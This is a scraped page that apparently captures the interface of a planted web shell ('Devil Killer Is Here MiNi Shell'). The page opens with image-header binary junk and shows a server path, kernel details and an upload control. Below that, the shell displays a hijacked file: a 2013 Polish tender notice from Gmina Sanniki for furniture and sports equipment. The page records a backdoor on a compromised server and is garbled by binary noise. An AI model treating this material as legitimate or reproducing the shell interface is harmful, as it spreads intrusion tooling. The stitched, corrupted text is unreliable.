JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130625/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130625/243846-N-2013.html

<p class="kh_header"><b>Sanniki: Remont budynku świetlicy wiejskiej w Szkaradzie wraz z utwardzeniem terenu działki budowlanej, budowa obiektów małej architektury oraz remontem boiska rekreacyjnego (w ramach zadania dostawa wyposażenia)</b><br>
<b>Numer ogłoszenia: 243846 - 2013; data zamieszczenia: 25.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sanniki , ul. Warszawska 169, 09-540 Sanniki, woj. mazowieckie, tel. 24 277 68 51, faks 24 277 68 51, 277 78 15.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sanniki.bip.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont budynku świetlicy wiejskiej w Szkaradzie wraz z utwardzeniem terenu działki budowlanej, budowa obiektów małej architektury oraz remontem boiska rekreacyjnego (w ramach zadania dostawa wyposażenia).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest dostawa wyposażenia w ramach zadania pn. Remont budynku świetlicy wiejskiej w Szkaradzie wraz z utwardzeniem terenu działki budowlanej, budowa obiektów małej architektury oraz remontem boiska rekreacyjnego (w ramach zadania dostawa wyposażenia).
Przedmiotem zamówienia jest dostawa i montaż mebli i gabloty informacyjnej oraz sprzętu sportowego.

Szczegółowy opis przedmiotu zamówienia: 
Część I  Meble i gablota informacyjna
Minimalny okres gwarancji udzielonej na meble i gablotę informacyjną wynosi 24 miesiące od daty odbioru przedmiotu zamówienia.
Przed dostawą wyposażenia Wykonawca ma obowiązek uzgodnić z zamawiającym kolor dostarczanych mebli. Wymagane jest dostarczenie wskazanych mebli 
w jednym kolorze. Preferowane przez zamawiającego kolory mebli: dąb, buk, olcha. Zamówienie obejmuje również montaż mebli i gabloty. 
Minimalne wymagane parametry poszczególnych elementów przedmiotu zamówienia:
1. Dostawa wyposażenia kuchni - stół  roboczy z  szufladą,  wykonany ze stali nierdzewnej. Stół przeznaczony do stosowania w ciągach technologicznych umożliwiających przyrządzanie i przygotowanie produktów przed ich termiczną obróbką. 
Wymiary stołu (długość/szerokość/wysokość): 90x90x85 cm
Ilość zamawianych sztuk: 4.
2. Dostawa wyposażenia kuchni i zaplecza kuchni - szafka pod zlewozmywak. Szafka wykonana z płyty meblowej gładkiej laminowanej, okleinowanej PCV o zwiększonej odporności na wilgoć Wymiary szafki 800x500x850cm.
Ilość zamawianych sztuk: 2.
3.Dostawa wyposażenia kuchni i zaplecza kuchni - szafka wisząca. Szafka wykonana z płyty meblowej gładkiej laminowanej, okleinowanej PCV o zwiększonej odporności na wilgoć. Wymiary szafki 900x730x350cm.
Ilość zamawianych sztuk: 6.
4.Dostawa wyposażenia do magazynu przy kuchni - regał magazynowy 120x60x200[h]cm.
Półki wykonane z płyty meblowej gładkiej laminowanej, okleinowanej PCV-obciążenie jednej półki -280-300kg. Regał zaczepowy(montaż bez śrub). Ilość półek - 5szt.
Ilość zamawianych sztuk:4
5. Wyposażenie świetlicy - biurko pod komputer 170x60 cm. Wys. 75-80cm..
Biurko wykonane z płyty meblowej laminowanej o grubości min. 18 mm, okleinowanej PCV.
Ilość zamawianych sztuk: 1
6.Wyposażenie świetlicy - krzesło komputerowe tapicerowane. Krzesło obrotowe z mechanizmem regulującym + regulowane podłokietniki z nakładkami z tworzywa sztucznego, miękkie tapicerowane siedzisko i oparcie, metalowa konstrukcja. Siedzisko i oparcie z tkaniny, wykonanej z włókna syntetycznego w kolorze szarym lub grafitowym.
wys. całkowita krzesła - 94-107cm;
wys.regulacji siedziska w zakresie - 44-55 cm.;
wys. regulacji podłokietnika w zakresie - 19-26 cm.;
wys. oparcia - 52- 60 cm.;
wym. siedziska - 48x48 cm.;
Ilość zamawianych sztuk:1 
7.Wyposażenie świetlicy  - krzesło świetlicowe miękkie tapicerowane siedzisko i oparcie, metalowa konstrukcja..
Siedzisko z tkaniny, wykonanej z włókna syntetycznego w kolorze szarym lub grafitowym.
Wysokość całkowita: 80-85 cm, szerokość siedziska:50-55cm, głębokość siedziska: 40-45cm, wysokość siedziska 45-50cm.
Ilość zamawianych sztuk: 200
8. Wyposażenie świetlicy - stół świetlicowy 
Wykonanie: stelaż z rurki fi min. 32 malowanej proszkowo. 
Blat z płyty meblowej laminowanej o grubości min. 18 mm, okleinowanej PCV. 
Stopki plastikowe zabezpieczające podłoże przed rysowaniem.
Wymiary stołu: długość:180 cm, szerokość: 80 cm wysokość: 75-80 cm.
Ilość zamawianych sztuk: 30
9.Wyposażenie świetlicy - gablota ogłoszeniowa zewnętrzna jednodrzwiowa oświetlana  
 Format: 10xA4
Wykonana z profili anodowanych 
Minimalne wymiary: 130x80x6,5 cm
Ilość zamawianych sztuk: 1

Część II -Sprzęt sportowy 
Minimalny okres gwarancji udzielonej na sprzęt sportowy wynosi 24 miesiące od daty odbioru przedmiotu zamówienia.
Minimalne wymagane parametry poszczególnych elementów przedmiotu zamówienia:
1.	Wyposażenie świetlicy - stół do tenisa
Dane techniczne:
-	stół tenisowy wewnętrzny (do suchych pomieszczeń).
-	siatka,
-	pozycja play-back.
-	4 pojedyncze kółka transportowe.
-	hamulce bezpieczeństwa x 2 (po przekątnej).
-	Uchwyty na piłki i rakietki.
Ilość zamawianych sztuk: 1kpl

2.	Wyposażenie świetlicy - piłkarzyki
Dane techniczne: 
-	wymiary minimalne:130 x 70 x 80 cm 
-	płyty boczne: płyta MDF, grubość minimalna: 14 mm, szerokość: 30-40 cm  
-	drążki zawodników: chromowana stal 
-	łożyska kulkowe 
-	stopki poziomujące 
Ilość zamawianych sztuk:1
3.	Wyposażenie świetlicy - stół bilardowy wraz z niezbędnymi akcesoriami
Dane techniczne:
-blat wykonany z płyty kamiennej jednolitej,
-wymiary: pole gry: 127x254cm,
-możliwość regulacji poziomu,
Wyposażenie: kije (min.6), bile (komplet do pool-a), kreda, podpórka, trójkąt, końcówki (10 sztuk)
Ilość zamawianych sztuk:1
4. Wyposażenie świetlicy  - stół do tenisa  kamienny granitowy 
Wymiary[m]: dł. 2,8; szer. 1,5; wys. 0,80; strefa bezpieczeństwa 5,5x8,8; 
liczba użytkowników 4. Zamówienie obejmuje również montaż sprzętu sportowego.
      Dane techniczne:
-	blat stołu szlifowany, zaimpregnowany specjalnym lakierem,
- siatka stalowa, ocynkowana ogniowo,
-	całość wsparta na konstrukcji stalowo-betonowej.
      Ilość zamawianych sztuk:1

Podane przez zamawiającego w opisie przedmiotu zamówienia  nazwy własne (pochodzenie, producent, itd.) mają jedynie charakter pomocniczy dla określenia podstawowych parametrów i cech zastosowanych materiałów. Zamawiający dopuszcza zastosowanie rozwiązań równoważnych. 
Produkt równoważny to taki, który ma te same cechy funkcjonalne, co wskazany w dokumentacji konkretny z nazwy lub pochodzenia produkt. Jego jakość nie może być gorsza od jakości określonego w specyfikacji produktu oraz powinien mieć parametry nie gorsze niż wskazany produkt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8, 37.40.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Ustawy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Ustawy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Ustawy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz pozostałych dokumentów składających się na ofertę: Formularz ofertowy - załącznik nr 1 do SIWZ. Kosztorys cenowy -załącznik nr 6 do SIWZ. Dokumenty wymagane w przypadku składania oferty wspólnej. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i do zawarcia umowy. Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. III.4.2) oraz Oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust.1 Ustawy - Prawo zamówień publicznych- wg załącznika nr 2 do SIWZ dla każdego wykonawcy z osobna a także listę podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informację o tym, że nie należy do grupy kapitałowej - wg załącznika nr 4 do SIWZ, pozostałe dokumenty mogą być złożone wspólnie. Dokumenty podmiotów zagranicznych. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1) zastępuje się je dokumentem zawierającym oświadczenie w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem- wystawione z odpowiednią datą wymaganą dla tych dokumentów</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany. Zmiany nie mogą naruszać postanowień zawartych w art. 144 ust. 1 Ustawy. 2. Zamawiający dopuszcza możliwość dokonania w umowie następujących zmian: 1) terminu wykonania przedmiotu umowy w następujących przypadkach:a) w przypadku wystąpienia siły wyższej, b) z przyczyn niezależnych od Wykonawcy na jego pisemny wniosek i za zgodą Zamawiającego. 2) zatrudnienia podwykonawców w przypadku, gdy Wykonawca oświadczył, iż wykona przedmiot umowy osobiście, 3) podwykonawcy oraz zakresu podwykonawstwa w przypadku, gdy Wykonawca wykonuje przedmiot umowy przy pomocy podwykonawców</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sanniki.bip.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Sannikach,
ul.Warszawska 169, 
09-540 Sanniki, 
pokój nr 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.07.2013 godzina 10:20, miejsce: Urząd Gminy w Sannikach, 
ul.Warszawska 169, 
09-540 Sanniki, 
pokój nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Na podstawie umowy o przyznanie pomocy Nr 00361-6922-UM0700342/10 RW.II./AR/0219.4-342/10 projekt jest dofinansowany w wysokości do 75% kosztów kwalifikowalnych ze środków Unii Europejskiej w ramach działania Odnowa i rozwój wsi, objętego Programem Rozwoju Obszarów Wiejskich na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Meble i gablota informacyjna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Minimalny okres gwarancji udzielonej na meble i gablotę informacyjną wynosi 24 miesiące od daty odbioru przedmiotu zamówienia.
Przed dostawą wyposażenia Wykonawca ma obowiązek uzgodnić z zamawiającym kolor dostarczanych mebli. Wymagane jest dostarczenie wskazanych mebli 
w jednym kolorze. Preferowane przez zamawiającego kolory mebli: dąb, buk, olcha. Zamówienie obejmuje również montaż mebli i gabloty. 
Minimalne wymagane parametry poszczególnych elementów przedmiotu zamówienia:
1. Dostawa wyposażenia kuchni - stół  roboczy z  szufladą,  wykonany ze stali nierdzewnej. Stół przeznaczony do stosowania w ciągach technologicznych umożliwiających przyrządzanie i przygotowanie produktów przed ich termiczną obróbką. 
Wymiary stołu (długość/szerokość/wysokość): 90x90x85 cm
Ilość zamawianych sztuk: 4.
2. Dostawa wyposażenia kuchni i zaplecza kuchni - szafka pod zlewozmywak. Szafka wykonana z płyty meblowej gładkiej laminowanej, okleinowanej PCV o zwiększonej odporności na wilgoć Wymiary szafki 800x500x850cm.
Ilość zamawianych sztuk: 2.
3.Dostawa wyposażenia kuchni i zaplecza kuchni - szafka wisząca. Szafka wykonana z płyty meblowej gładkiej laminowanej, okleinowanej PCV o zwiększonej odporności na wilgoć. Wymiary szafki 900x730x350cm.
Ilość zamawianych sztuk: 6.
4.Dostawa wyposażenia do magazynu przy kuchni - regał magazynowy 120x60x200[h]cm.
Półki wykonane z płyty meblowej gładkiej laminowanej, okleinowanej PCV-obciążenie jednej półki -280-300kg. Regał zaczepowy(montaż bez śrub). Ilość półek - 5szt.
Ilość zamawianych sztuk:4
5. Wyposażenie świetlicy - biurko pod komputer 170x60 cm. Wys. 75-80cm..
Biurko wykonane z płyty meblowej laminowanej o grubości min. 18 mm, okleinowanej PCV.
Ilość zamawianych sztuk: 1
6.Wyposażenie świetlicy - krzesło komputerowe tapicerowane. Krzesło obrotowe z mechanizmem regulującym + regulowane podłokietniki z nakładkami z tworzywa sztucznego, miękkie tapicerowane siedzisko i oparcie, metalowa konstrukcja. Siedzisko i oparcie z tkaniny, wykonanej z włókna syntetycznego w kolorze szarym lub grafitowym.
wys. całkowita krzesła - 94-107cm;
wys.regulacji siedziska w zakresie - 44-55 cm.;
wys. regulacji podłokietnika w zakresie - 19-26 cm.;
wys. oparcia - 52- 60 cm.;
wym. siedziska - 48x48 cm.;
Ilość zamawianych sztuk:1 
7.Wyposażenie świetlicy  - krzesło świetlicowe miękkie tapicerowane siedzisko i oparcie, metalowa konstrukcja..
Siedzisko z tkaniny, wykonanej z włókna syntetycznego w kolorze szarym lub grafitowym.
Wysokość całkowita: 80-85 cm, szerokość siedziska:50-55cm, głębokość siedziska: 40-45cm, wysokość siedziska 45-50cm.
Ilość zamawianych sztuk: 200
8. Wyposażenie świetlicy - stół świetlicowy 
Wykonanie: stelaż z rurki fi min. 32 malowanej proszkowo. 
Blat z płyty meblowej laminowanej o grubości min. 18 mm, okleinowanej PCV. 
Stopki plastikowe zabezpieczające podłoże przed rysowaniem.
Wymiary stołu: długość:180 cm, szerokość: 80 cm wysokość: 75-80 cm.
Ilość zamawianych sztuk: 30
9.Wyposażenie świetlicy - gablota ogłoszeniowa zewnętrzna jednodrzwiowa oświetlana  
 Format: 10xA4
Wykonana z profili anodowanych 
Minimalne wymiary: 130x80x6,5 cm
Ilość zamawianych sztuk: 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sprzęt sportowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Minimalny okres gwarancji udzielonej na sprzęt sportowy wynosi 24 miesiące od daty odbioru przedmiotu zamówienia.
Minimalne wymagane parametry poszczególnych elementów przedmiotu zamówienia:
1.	Wyposażenie świetlicy - stół do tenisa
Dane techniczne:
-	stół tenisowy wewnętrzny (do suchych pomieszczeń).
-	siatka,
-	pozycja play-back.
-	4 pojedyncze kółka transportowe.
-	hamulce bezpieczeństwa x 2 (po przekątnej).
-	Uchwyty na piłki i rakietki.
Ilość zamawianych sztuk: 1kpl

2.	Wyposażenie świetlicy - piłkarzyki
Dane techniczne: 
